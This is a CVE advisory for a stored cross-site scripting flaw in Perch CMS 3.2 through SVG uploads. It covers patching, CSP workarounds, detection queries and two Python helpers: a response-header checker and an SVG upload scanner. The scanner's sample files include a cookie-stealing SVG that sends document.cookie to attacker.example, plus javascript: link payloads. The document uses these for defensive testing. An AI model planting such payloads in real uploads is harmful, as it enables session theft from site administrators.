CVE-2023-53890

CVSS 5.4 MEDIUM

📋 TL;DR

Perch CMS 3.2 contains a stored cross-site scripting vulnerability: an authenticated user with upload rights can upload an SVG file containing JavaScript (a <script> element, an event-handler attribute such as onload, or a javascript: link), and the CMS stores and serves the file unchanged. When a victim opens the stored file at its own URL, the embedded script runs in the same origin as the CMS, where it can read session cookies or issue requests as the victim. SVGs rendered through an <img> element or CSS do not run script, so the attacker needs the victim to open the file directly or to have it embedded with <object>, <iframe> or <embed>. All Perch CMS 3.2 installations that accept SVG uploads are affected.

💻 Affected Systems

Products:
  • Perch CMS
Versions: 3.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated user with file upload permissions, and SVG must be among the allowed upload types.

⚠️ Risk & Real-World Impact

🔴 Worst Case

An attacker lures an administrator into opening the stored SVG. The script runs in the administrator's session: it can read the session cookie if the cookie is not HttpOnly, and can act on the administrator's behalf against the admin interface regardless, giving full control of the CMS, defacement of the site, or redirection of visitors to attacker-controlled sites.

🟠 Likely Case

An authenticated user with upload privileges embeds tracking or cookie-stealing script that runs against other editors who open the file, or uses it for limited client-side attacks.

🟢 If Mitigated

With SVG uploads rejected, or stored files served under a Content Security Policy that blocks inline script, the impact is limited to visual defacement of the image without script execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploit requires authenticated access but is trivial to execute once authenticated. Public exploit code is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.2.1

Vendor Advisory: https://grabaperch.com/

Restart Required: No

Instructions:

1. Back up your Perch CMS installation (files and database).
2. Download Perch CMS 3.2.1 from the official website.
3. Replace the existing installation files with the patched version.
4. Clear any cached files or assets.

🔧 Temporary Workarounds

Disable SVG file uploads (applies to: all)

Configure Perch CMS to reject SVG uploads entirely: edit the Perch configuration to remove SVG from the allowed file types. SVG files that were stored before the change remain a risk until they are reviewed or removed.

Implement a Content Security Policy (applies to: all)

Add a CSP header to the responses that serve uploaded files so that inline script cannot run, for example:

Content-Security-Policy: default-src 'self'; script-src 'self'

The header must be set on the response for the SVG itself (the upload/resources directory in the web server configuration). A CSP set on the CMS's HTML pages does not apply to a file the victim opens at its own URL. Because 'self' still permits scripts fetched from the same origin, a stricter choice for a directory of uploaded files is Content-Security-Policy: sandbox, or Content-Disposition: attachment so that the browser downloads the file instead of rendering it.
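The check below is an added example for this advisory, not code from the page or from Perch CMS. Given the response headers returned for a GET of a stored SVG, it reports whether a script inside the file could run when the file is opened at its own URL, applying the CSP fallback rule (script-src, else default-src), the sandbox directive and Content-Disposition. The function names, the header sets and the /perch/resources/ path in the comment are constructed for illustration.

```python
"""Classify, from its response headers alone, whether a stored SVG opened at
its own URL could run script.

Added example for this advisory, not Perch CMS code. Header names and sample
values below are constructed.
"""


def parse_csp(csp: str) -> dict[str, list[str]]:
    """Split a Content-Security-Policy value into {directive: [sources]}.

    Browsers honour only the first occurrence of a repeated directive, so
    later duplicates are ignored here as well.
    """
    policy: dict[str, list[str]] = {}
    for chunk in csp.split(";"):
        tokens = chunk.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def svg_script_verdict(headers: dict[str, str]) -> str:
    """Return one of 'download', 'sandboxed', 'blocked' or 'executable'.

    Only the headers on the SVG's own response count: a CSP set on the CMS's
    HTML pages does nothing for a file that a victim opens directly.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("content-disposition", "").strip().lower().startswith("attachment"):
        return "download"      # saved to disk, never rendered
    policy = parse_csp(h.get("content-security-policy", ""))
    if "sandbox" in policy and "allow-scripts" not in policy["sandbox"]:
        return "sandboxed"     # rendered with script disabled and an opaque origin
    # Script execution is governed by script-src, falling back to default-src.
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return "executable"    # no script restriction at all
    if "'unsafe-inline'" in sources:
        return "executable"    # inline <script> and on* handlers explicitly allowed
    return "blocked"           # inline script blocked; external script limited to listed sources


# Constructed header sets for a GET of a stored file such as
# /perch/resources/logo.svg (path assumed, not taken from Perch).
UNHARDENED = {"Content-Type": "image/svg+xml"}
PAGE_CSP = {"Content-Type": "image/svg+xml",
            "Content-Security-Policy": "default-src 'self'; script-src 'self'"}
SANDBOXED = {"Content-Type": "image/svg+xml",
             "Content-Security-Policy": "sandbox"}
DOWNLOAD = {"Content-Type": "image/svg+xml",
            "Content-Disposition": 'attachment; filename="logo.svg"'}

if __name__ == "__main__":
    for name, hdrs in (("UNHARDENED", UNHARDENED), ("PAGE_CSP", PAGE_CSP),
                       ("SANDBOXED", SANDBOXED), ("DOWNLOAD", DOWNLOAD)):
        print(f"{name}: {svg_script_verdict(hdrs)}")
```

Feed it the headers from a curl -I of a stored SVG after applying the workaround. A verdict of "blocked" confirms that the header reached the file's own response; "sandboxed" or "download" are the stronger outcomes, since 'self' in script-src still allows scripts served from the same origin.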

🧯 If You Can't Patch

  • Restrict file upload permissions to trusted administrators only, and review SVG files already stored in the upload directory for script content
  • Implement web application firewall rules to block SVG uploads containing script. A rule that matches only the <script> tag is easy to bypass: script can also be carried in event-handler attributes (onload, onclick), in javascript: URLs in href, in a <foreignObject> wrapping HTML, or in an <animate> element that rewrites an href. Blocking SVG uploads altogether is more reliable than pattern matching

🔍 How to Verify

Check if Vulnerable:

Confirm the installation is Perch CMS 3.2. Then, in a test environment and with an account that has upload rights, upload an SVG whose only script is harmless (for example one that sets document.title) and open the stored file at its own URL in a browser. If the script runs, the installation is vulnerable. Do not test with a payload that exfiltrates data.

Check Version:

Check Perch admin dashboard or examine perch/core/version.php file

Verify Fix Applied:

Verify that the installation reports version 3.2.1, then repeat the upload test: SVG files containing script must either be rejected at upload, or be stored such that opening them at their own URL does not execute the script.
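The scanner below is an added example for this advisory, not Perch CMS code or a vendor tool. It classifies an SVG file as safe to store or not, covering the vectors named in the workaround above (a <script> element, on* event-handler attributes, javascript: URLs, <foreignObject>, and <animate> retargeting an href), and it can be run over an existing upload directory as part of the verification step. The function names and all three sample files are constructed; rejecting, rather than sanitising, is the design goal, so anything that is not plain drawing content is reported.

```python
"""Reject SVG uploads that could run script when opened directly in a browser.

Added example for this advisory; it is not Perch CMS code. Anything that is
not plain SVG drawing content is a finding, so the file should be rejected.
"""
import re
import xml.etree.ElementTree as ET

# Elements that embed script, HTML or other documents inside an SVG.
DANGEROUS_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object", "handler"}
# Attributes that take a URL or a list of URLs. 'from', 'to', 'values' and 'by'
# are animation attributes that can retarget an <a href> to a javascript: URL.
URL_ATTRS = {"href", "src", "from", "to", "values", "by"}
URL_SCHEME_RE = re.compile(r"^(javascript|vbscript|data):", re.I)


def _local(qname: str) -> str:
    """ElementTree spells namespaced names as '{uri}local'; keep the local part."""
    return qname.rsplit("}", 1)[-1].lower()


def _strip_ws(value: str) -> str:
    """Browsers ignore ASCII whitespace/control characters inside a scheme ('java\\tscript:')."""
    return re.sub(r"[\x00-\x20]", "", value)


def scan_svg(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means the file may be stored as SVG."""
    text = data.decode("utf-8", errors="replace")
    # Refuse internal DTD subsets before parsing so entity expansion cannot be
    # turned against the scanner itself.
    if "<!ENTITY" in text.upper():
        return ["internal DTD entity declaration"]
    findings: list[str] = []
    if "<?xml-stylesheet" in text.lower():
        findings.append("xml-stylesheet processing instruction")  # external XSL can carry script
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS:
                # 'values' is a semicolon-separated list; check every entry.
                for part in value.split(";"):
                    if URL_SCHEME_RE.match(_strip_ws(part)):
                        findings.append(f"{name}={part.strip()!r} on <{tag}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    return not scan_svg(data)


# Constructed samples (not taken from any real upload).
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink"
     onload="fetch('https://attacker.example/?c=' + document.cookie)">
  <script>document.title = 'svg-xss'</script>
  <a xlink:href="java&#9;script:alert(1)"><text y="10">click</text></a>
</svg>"""

# No <script> tag at all: a WAF rule matching only "<script" misses this one.
ANIMATE_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg">
  <a><animate attributeName="href" values="javascript:alert(1)"/><text y="10">x</text></a>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG),
                          ("animate", ANIMATE_SVG)):
        print(label, scan_svg(sample) or "clean")
```

To review an existing installation, call scan_svg on every .svg under the upload directory and treat any non-empty result as a file to quarantine. Files that fail to parse are reported as findings rather than ignored, since a browser may still render what the XML parser rejects.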

📡 Detection & Monitoring

Log Indicators:

  • Unusual SVG file uploads, especially from accounts that do not normally upload images
  • Multiple failed upload attempts with SVG files
  • Admin user uploading files from unusual IP addresses
  • Requests to the admin interface whose Referer is a stored .svg file (script running inside an opened SVG sends requests with that file's URL as the referrer)

Network Indicators:

  • HTTP POST requests to the admin upload endpoint carrying multipart/form-data with a .svg filename (the filename is in the request body, not in the URL)
  • GET requests for stored .svg files as top-level navigations (Sec-Fetch-Dest: document) rather than as images (Sec-Fetch-Dest: image), followed by requests from the same client to unexpected external hosts

SIEM Query:

The upload itself is a POST to the admin interface, not to a .svg path, so a query for POST requests with a .svg URI does not match it. Look instead for stored SVGs being opened directly, which is the condition under which the script runs (field names follow this page's example and will differ by SIEM; logging Sec-Fetch-Dest requires adding that header to the web server's log format):

source="web_logs" AND http_method="GET" AND uri_path="*.svg" AND (sec_fetch_dest="document" OR referer="")
